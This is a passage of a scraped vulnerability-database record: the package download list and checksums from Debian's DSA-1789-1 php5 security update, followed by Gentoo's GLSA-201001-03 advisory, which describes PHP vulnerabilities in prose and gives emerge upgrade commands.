http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny3_mipsel.deb\n Size/MD5 checksum: 365260 1a0ed4b1f60a285f7f87dfb0534cfe09\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny3_mipsel.deb\n Size/MD5 checksum: 24758 df1ce5be247367f67ae6e80d907ab41d\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny3_mipsel.deb\n Size/MD5 checksum: 62746 8bb27e77fbad03df7e03d01cb8932743\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny3_mipsel.deb\n Size/MD5 checksum: 23094 0027bd65d42869e010ab2bf654c5d36b\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny3_mipsel.deb\n Size/MD5 checksum: 11438 587fb68608ab53f352eff1c9b5a5c968\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny3_mipsel.deb\n Size/MD5 checksum: 15904 2b9eb9ea7485d79a3127fa10d29dd4a9\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny3_mipsel.deb\n Size/MD5 checksum: 18326 8102924db02ce08edaa5090225504d52\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny3_mipsel.deb\n Size/MD5 checksum: 2467346 43518bc368b3298df596d114051a64cf\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny3_mipsel.deb\n Size/MD5 checksum: 8212 5f7fc7ed29922901aefee1322acf2fba\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny3_mipsel.deb\n Size/MD5 checksum: 50786 16fccd64ccfe880355b8eb7e6d467075\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny3_mipsel.deb\n Size/MD5 checksum: 362816 a1be41f39de860104f23745ce30eb60f\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny3_mipsel.deb\n Size/MD5 checksum: 12310 7646f6f475c51b8903e097daca712950\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny3_mipsel.deb\n Size/MD5 checksum: 35228 86c7f6031f849b10ae5147575bec1262\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny3_mipsel.deb\n Size/MD5 checksum: 5272 965b8b4e3cc0e5229ecf0e7345767194\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny3_mipsel.deb\n Size/MD5 checksum: 35648 8fb35906d69b0cee69b92eaa3409c992\n http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny3_mipsel.deb\n Size/MD5 checksum: 8844704 e386a1de15fa024821baa029ee908be5\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny3_mipsel.deb\n Size/MD5 checksum: 4904808 5f8a2dc28c3ac0b8ed0d1f608f2ff1b1\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny3_powerpc.deb\n Size/MD5 checksum: 362902 0be5fc02aec8884c8acec55600975c7d\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny3_powerpc.deb\n Size/MD5 checksum: 60398 c0a7ffbeaa571375c992458c468e3c69\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny3_powerpc.deb\n Size/MD5 checksum: 5072872 bd44f781031120eba5d8f0d8d7c830e3\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny3_powerpc.deb\n Size/MD5 checksum: 370118 7cdc7e4b37c72f4e55ef1396ad983438\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny3_powerpc.deb\n Size/MD5 checksum: 28060 16d0be6b6fd5c3602ece5343bf18d2b8\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny3_powerpc.deb\n Size/MD5 checksum: 39122 fddaa821c6f5794620e9322e8871c0bb\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny3_powerpc.deb\n Size/MD5 checksum: 42752 b6f5d6caa8112190003387b5bbe333ea\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny3_powerpc.deb\n Size/MD5 checksum: 14130 5fb950c2393bc1bee3bd936f8a84021b\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny3_powerpc.deb\n Size/MD5 checksum: 41052 2683cd5643fec2e95afab59637cd4efd\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny3_powerpc.deb\n Size/MD5 checksum: 7522 a05450cb115a47805de4bcf8fe740c7a\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny3_powerpc.deb\n Size/MD5 checksum: 21528 54024ed51baff5e6e6ac9b3e62a8bef4\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny3_powerpc.deb\n Size/MD5 checksum: 2647478 881062b9bddbef63d37dc0ef5a2e7b9c\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny3_powerpc.deb\n Size/MD5 checksum: 20048 b83774dc4ae11dd797be6e963671bc74\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny3_powerpc.deb\n Size/MD5 checksum: 7222 3e05102da0f2502ebdecf0147c03a896\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny3_powerpc.deb\n Size/MD5 checksum: 2644668 3c28879e607e30d2e051a78fee458d67\n http://security.debian.org/pool/updates/main/p/php5/php5-interbase_5.2.6.dfsg.1-1+lenny3_powerpc.deb\n Size/MD5 checksum: 56358 0937bc16c4fe9082a375d822a2115846\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny3_powerpc.deb\n Size/MD5 checksum: 77028 ddcd7478c58beee78eedcec016645d2c\n http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny3_powerpc.deb\n Size/MD5 checksum: 16954 54afa9c0cab6163b1b038e375d18ad00\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny3_powerpc.deb\n Size/MD5 checksum: 15948 6c79622285b8843e59402289b158c3cb\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny3_powerpc.deb\n Size/MD5 checksum: 30514 cd522222967b7dfd40fbb6552aa3bae3\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny3_powerpc.deb\n Size/MD5 checksum: 38122 2cd615c6def56a383db21eaf667f74d5\n http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny3_powerpc.deb\n Size/MD5 checksum: 8997068 34060784b3a1d89a411c3af22959931e\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny3_powerpc.deb\n Size/MD5 checksum: 10984 8de46d226b068f598ab9c28ed5820b3c\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny3_powerpc.deb\n Size/MD5 checksum: 16060 6ddd8dea6a25532e64d5300edf13967b\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny3_powerpc.deb\n Size/MD5 checksum: 42312 231368114977880457320bc1438b4f12\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny3_powerpc.deb\n Size/MD5 checksum: 2557048 9928155dff896c0c08e9b9e57d9c6f53\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny3_s390.deb\n Size/MD5 checksum: 2699146 80469dac8ffe193dcd6872ef49645692\n http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny3_s390.deb\n Size/MD5 checksum: 15526 be6fe825489e6c78e77a0c22605d91a9\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny3_s390.deb\n Size/MD5 checksum: 5296 c0f941ac316e9816b6ab48f3157dfee8\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny3_s390.deb\n Size/MD5 checksum: 13996 5b32f9be24b7165897e843cf9b4c3e69\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny3_s390.deb\n Size/MD5 checksum: 5229324 0b50126324846300a57854fbc82d1c63\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny3_s390.deb\n Size/MD5 checksum: 58512 96e39170b492d6d20f7d37bdf99249a7\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny3_s390.deb\n Size/MD5 checksum: 362748 bc860d0b8b98073281425309437b5b77\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny3_s390.deb\n Size/MD5 checksum: 41956 fd9b8facda486c817b5655378070fba9\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny3_s390.deb\n Size/MD5 checksum: 2633632 b3981386d47cfa9c2e49e3bbab9f25d0\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny3_s390.deb\n Size/MD5 checksum: 368902 df32054c14e2f7d51ac8f14668c4bfb5\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny3_s390.deb\n Size/MD5 checksum: 12356 76f361b160f9906ad5f6e440e99a1226\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny3_s390.deb\n Size/MD5 checksum: 5586 21268003a9d85a0a3effde2ec9bc6c72\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny3_s390.deb\n Size/MD5 checksum: 39684 2ef3bbdffa15b0c6bbccd8a5c3c499d8\n http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny3_s390.deb\n Size/MD5 checksum: 9054456 9e0fee68eae66a9c71e821ac31ee1831\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny3_s390.deb\n Size/MD5 checksum: 28236 5713dbf16dc3decf659c41faaf8de208\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny3_s390.deb\n Size/MD5 checksum: 18602 9a1072857e9ced699b7cb05cfccabc4b\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny3_s390.deb\n Size/MD5 checksum: 9352 3b116cc9b2788c1623351ddb7ce91436\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny3_s390.deb\n Size/MD5 checksum: 37982 483d126a0d45a4b561ad33e08f4df302\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny3_s390.deb\n Size/MD5 checksum: 14186 ee16ed311d1580d82464b4c123beea16\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny3_s390.deb\n Size/MD5 checksum: 36314 0ddf73e77428f2a16c02750fbb3c7467\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny3_s390.deb\n Size/MD5 checksum: 20678 0eebf578e0c80c53adc76bb984ba911b\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny3_s390.deb\n Size/MD5 checksum: 38304 0c0b83646aff55840a0091ebe9162170\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny3_s390.deb\n Size/MD5 checksum: 2696548 f80be6e2dc1225f2ecd2e91df5cdea0f\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny3_s390.deb\n Size/MD5 checksum: 25182 40df367c802650bd173bdc8583db70f0\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny3_s390.deb\n Size/MD5 checksum: 73790 eaad8d04bf11abb07788bc37eb43e45a\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny3_sparc.deb\n Size/MD5 checksum: 17482 88611ca8b3dd5da77dfd732d671e752b\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny3_sparc.deb\n Size/MD5 checksum: 33782 e8df34682e569a177d2145a3613f3c63\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny3_sparc.deb\n Size/MD5 checksum: 4814 f3c1ee8b63bde7a27ba6eea1c4a1751d\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny3_sparc.deb\n Size/MD5 checksum: 16520 255ccddb387cbdcbd6b1e6577aedc2c7\n http://security.debian.org/pool/updates/main/p/php5/php5-interbase_5.2.6.dfsg.1-1+lenny3_sparc.deb\n Size/MD5 checksum: 43948 afa0c628790896178c0bb8e61577f59d\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny3_sparc.deb\n Size/MD5 checksum: 13084 a704c8b024c8300c4d5301882cc7bc98\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny3_sparc.deb\n Size/MD5 checksum: 4818156 ffeb690f134063de643223da003f8f40\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny3_sparc.deb\n Size/MD5 checksum: 2425786 8f9a0a4151b63329f074f9f5b0dfa6a0\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny3_sparc.deb\n Size/MD5 checksum: 12328 0121b749e5bc52020a083eb92c0ba70e\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny3_sparc.deb\n Size/MD5 checksum: 63028 47b27fee939fe51d6d20dc5ab6e18060\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny3_sparc.deb\n Size/MD5 checksum: 8192 c07f22bccc4d0e6f6cd5bc3e6060a6bb\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny3_sparc.deb\n Size/MD5 checksum: 365914 d1c135001df7fc4f7c3e645a7f1d16f6\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny3_sparc.deb\n Size/MD5 checksum: 32958 6f79ce6adb69b3d123b3ad30d8429e69\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny3_sparc.deb\n Size/MD5 checksum: 34068 89bbf8718b31807276282ce335e2417f\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny3_sparc.deb\n Size/MD5 checksum: 32832 4ee6ac773812693aab1ee13dfe4d0413\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny3_sparc.deb\n Size/MD5 checksum: 11212 375312647e1b170f131ea47e561ed715\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny3_sparc.deb\n Size/MD5 checksum: 5008 2e2b6dcd0b3abb779fe6bbdf5194644f\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny3_sparc.deb\n Size/MD5 checksum: 2474234 10cabcad892ff8ba50c939b21e87aa74\n http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny3_sparc.deb\n Size/MD5 checksum: 8379988 7a3e337c215f6751f9c7dc2330be9279\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny3_sparc.deb\n Size/MD5 checksum: 49962 faa9ccffb8ee5ed3ae466a450cf10e5d\n http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny3_sparc.deb\n Size/MD5 checksum: 13440 82c0f647a2975869caa27fb989662214\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny3_sparc.deb\n Size/MD5 checksum: 24286 cc1a0a4d3bbd41d20e64a8fc4c6862d3\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny3_sparc.deb\n Size/MD5 checksum: 365406 0494eb776d482b40f6113b6bd719d8b9\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny3_sparc.deb\n Size/MD5 checksum: 24306 87a89e01d39619fd7369c5e424bcef45\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny3_sparc.deb\n Size/MD5 checksum: 35952 2543ec38640668a49ba063b0caf9449b\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny3_sparc.deb\n Size/MD5 checksum: 2475310 fe539afd738ea4f1d6c8b8e91cfcaa68\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2009-05-04T20:58:11", "published": "2009-05-04T20:58:11", "id": "DEBIAN:DSA-1789-1:B5F1B", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00100.html", "title": "[SECURITY] [DSA 1789-1] New php5 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:54", "bulletinFamily": "unix", "description": "### Background\n\nPHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. \n\n### Description\n\nMultiple vulnerabilities have been discovered in PHP. Please review the CVE identifiers referenced below and the associated PHP release notes for details. \n\n### Impact\n\nA context-dependent attacker could execute arbitrary code via a specially crafted string containing an HTML entity when the mbstring extension is enabled. Furthermore a remote attacker could execute arbitrary code via a specially crafted GD graphics file. \n\nA remote attacker could also cause a Denial of Service via a malformed string passed to the json_decode() function, via a specially crafted ZIP file passed to the php_zip_make_relative_path() function, via a malformed JPEG image passed to the exif_read_data() function, or via temporary file exhaustion. It is also possible for an attacker to spoof certificates, bypass various safe_mode and open_basedir restrictions when certain criteria are met, perform Cross-site scripting attacks, more easily perform SQL injection attacks, manipulate settings of other virtual hosts on the same server via a malicious .htaccess entry when running on Apache, disclose memory portions, and write arbitrary files via a specially crafted ZIP archive. Some vulnerabilities with unknown impact and attack vectors have been reported as well. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll PHP users should upgrade to the latest version. As PHP is statically linked against a vulnerable version of the c-client library when the imap or kolab USE flag is enabled (GLSA 200911-03), users should upgrade net-libs/c-client beforehand: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-libs/c-client-2007e\"\n # emerge --ask --oneshot --verbose \">=dev-lang/php-5.2.12\"", "modified": "2010-01-05T00:00:00", "published": "2010-01-05T00:00:00", "id": "GLSA-201001-03", "href": "https://security.gentoo.org/glsa/201001-03", "type": "gentoo", "title": "PHP: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}